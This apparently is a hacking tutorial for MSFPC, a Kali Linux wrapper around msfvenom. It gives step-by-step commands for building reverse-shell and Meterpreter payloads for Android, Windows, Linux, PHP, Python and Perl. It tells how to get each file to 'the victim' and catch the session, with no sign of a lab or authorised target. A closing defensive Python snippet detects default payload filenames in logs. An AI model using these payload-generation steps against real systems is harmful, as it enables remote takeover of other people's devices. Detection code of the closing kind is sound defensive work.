Hey Folks, in this tutorial we will talk about the MSFPC tool, which is already installed in Kali Linux. If you know msfvenom, you will find it easy to understand, because MSFPC is an alternative to it. With msfvenom you have to create each payload yourself, whereas with msfpc you can create multiple payloads with a single command; that is the difference between the two tools.
MSFvenom Payload Creator (MSFPC) is an automatic tool that generates multiple types of payloads, based on user-selected options. The idea is to be as simple as possible (using as few as one option) to produce a payload. Fully automating msfvenom & Metasploit is the end goal.
Author : g0tmi1k
Let's do it!!
First, we will introduce the features of this tool.
<TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
TYPE : Apk, Windows, Asp, Java, Powershell etc.
DOMAIN/IP : Interface or IP Address.
CMD : is a standard/native command prompt/terminal to interact with.
MSF : is a custom cross platform shell, gaining the full power of Metasploit.
BIND : opens a port on the target side, and the attacker connects to them.
REVERSE : makes the target connect back to the attacker. The attacker needs an open port.
STAGED : splits the payload into parts, making it smaller but dependent on Metasploit.
STAGELESS : is the complete standalone payload. More "stable".
TCP : is the standard method of connecting back. This is the most compatible with TYPES as it is RAW.
HTTP : makes the communication appear to be HTTP traffic (unencrypted).
HTTPS : makes the communication appear to be (encrypted) HTTP traffic using SSL.
FIND_PORT : will attempt every port on the target machine, to find a way out.
LOOP : will just create one of each TYPE.
VERBOSE : will display all information.
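If you want to install this tool on Ubuntu or another operating system, you can download it with the following commands. Note that the -k option tells curl to skip TLS certificate verification, so review the downloaded script before running it.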
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
chmod 0755 /usr/local/bin/msfpc
First, create a payload for the Android platform with the following command. When we run it, it asks us to choose the interface, and we can select whichever one we need. It selects port 443 by default, but we can change that.
Usage: msfpc <TYPE>
msfpc APK
You can see that the payload is made with very little effort. After creating the payload we need to execute the "msfconsole" command, which is highlighted in the output above.
We also need to get the file to the victim, which can be done in whatever way suits you. The tool also provides a Python file-share command just below the msfvenom command, which we can run in a separate terminal.
Done! When the victim downloads our payload and runs it, we can control the Android phone through the multi handler.
For the Windows platform we repeat the same process as above, but this time we give our local address and port number in advance.
Usage: msfpc <TYPE> <IP> <PORT>
msfpc EXE 192.168.0.103 4444
Once the payload is created, the tool gives us the Python file-share command and the multi handler command, which we have to run together in separate terminals.
Alright! The meterpreter session will arrive here as soon as the victim runs our payload.
Now we will create a payload for the Linux platform with the following command. This time we choose the Ethernet (eth0) interface, which holds our local address.
Usage: msfpc <TYPE> <IP/ETH0> <PORT>
msfpc bash eth0 4445
As we know, a Linux shell script has to be given execute permission before it can be run.
chmod 777 bash-shell-staged-reverse-tcp-4445.sh
./bash-shell-staged-reverse-tcp-4445.sh
After doing all this, the meterpreter session will arrive here when the victim runs the payload.
Now we will create another payload for the Linux platform. The difference from the previous payload is that the first one had the ".sh" extension, while this one is an ELF file with the ".elf" extension.
Usage: msfpc <TYPE> <IP/ETH0> <PORT>
msfpc Linux 192.168.0.103 4445
The victim needs to give this Linux program execute permission with chmod.
chmod 777 linux-shell-staged-reverse-tcp-4445.elf
./linux-shell-staged-reverse-tcp-4445.elf
Nice! As soon as the victim runs the payload, the meterpreter session comes to the attacker.
Let's try to create a payload in PHP with the following command. As we know, PHP must be set up on the web server, Windows or Linux machine in order to execute a PHP script.
Usage: msfpc <TYPE> <IP/ETH0> <PORT>
msfpc PHP eth0 4444
Some permissions have to be granted after the payload is downloaded.
chmod 777 php-meterpreter-staged-reverse-tcp-4444.php
php php-meterpreter-staged-reverse-tcp-4444.php
Done! The meterpreter session will arrive here after the payload is run.
As we know, Python is an interpreted, high-level, general-purpose programming language, and almost every operating system comes with it configured. Hence we will create our payload for the Python platform with the following command.
Usage: msfpc <TYPE> <IP/ETH0> <PORT>
msfpc Python 192.168.0.103 4444
When the target runs the ".py" file on its system, the meterpreter session will immediately arrive here.
Perl is a family of two high-level, general-purpose, interpreted, dynamic programming languages, and it also comes with the Linux operating system. Let's make a payload for the Perl platform with the given command.
Usage: msfpc <TYPE> <IP/ETH0> <PORT>
msfpc perl eth0 4444
The meterpreter session will arrive here as soon as the victim runs the payload with the perl command.
A loop allows code to be executed repeatedly; in the same way, we can create one payload for each platform with the given command.
msfpc verbose loop eth0
Stageless payloads are full standalone payloads that are more stable than staged payloads and help maintain a meterpreter session. We can create a stageless payload with the following command.
msfpc stageless APK 192.168.0.103 4444
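The payload files generated in this tutorial all follow one naming pattern, for example linux-shell-staged-reverse-tcp-4445.elf. As an added example (not part of the original tutorial or of MSFPC itself), the following Python code shows how a defender could flag such default names in a file listing or download log and recover the shell type, transport and port. The field layout is an assumption inferred from the three filenames shown above, and the sample paths are constructed.

```python
import re

# Field layout inferred from the filenames in this tutorial (assumption):
#   <type>-<shell>-<staging>-<direction>-<transport>-<port>.<ext>
MSFPC_NAME = re.compile(
    r"^(?P<type>[a-z0-9]+)-"
    r"(?P<shell>shell|meterpreter)-"
    r"(?P<staging>staged|stageless)-"
    r"(?P<direction>reverse|bind)-"
    r"(?P<transport>tcp|https|http|find_port)-"
    r"(?P<port>\d{1,5})\.(?P<ext>[a-z0-9]+)$"
)


def parse_msfpc_name(path):
    """Return the decoded fields for an MSFPC-style filename, or None."""
    # Accept both / and \ separators so Windows paths from logs also work.
    name = re.split(r"[\\/]", path)[-1].lower()
    match = MSFPC_NAME.match(name)
    if match is None:
        return None
    fields = match.groupdict()
    fields["port"] = int(fields["port"])
    if not 1 <= fields["port"] <= 65535:
        return None  # not a valid port, so not a default MSFPC name
    return fields


def triage(paths):
    """Map each matching path to its decoded fields; skip benign names."""
    parsed = ((p, parse_msfpc_name(p)) for p in paths)
    return {p: f for p, f in parsed if f is not None}


# Constructed sample: file paths as they might appear in a download log.
SAMPLE_PATHS = [
    "/tmp/linux-shell-staged-reverse-tcp-4445.elf",
    "/var/www/html/php-meterpreter-staged-reverse-tcp-4444.php",
    "C:\\Users\\bob\\Downloads\\windows-meterpreter-stageless-reverse-https-443.exe",
    "/home/alice/report-final-2024.pdf",
    "/tmp/bash-shell-staged-reverse-tcp-99999.sh",
]

if __name__ == "__main__":
    for path, fields in triage(SAMPLE_PATHS).items():
        print(path, "->", fields)
```

A renamed payload will not match, so a filename hit is a triage signal to combine with hash, process and network evidence rather than a verdict on its own.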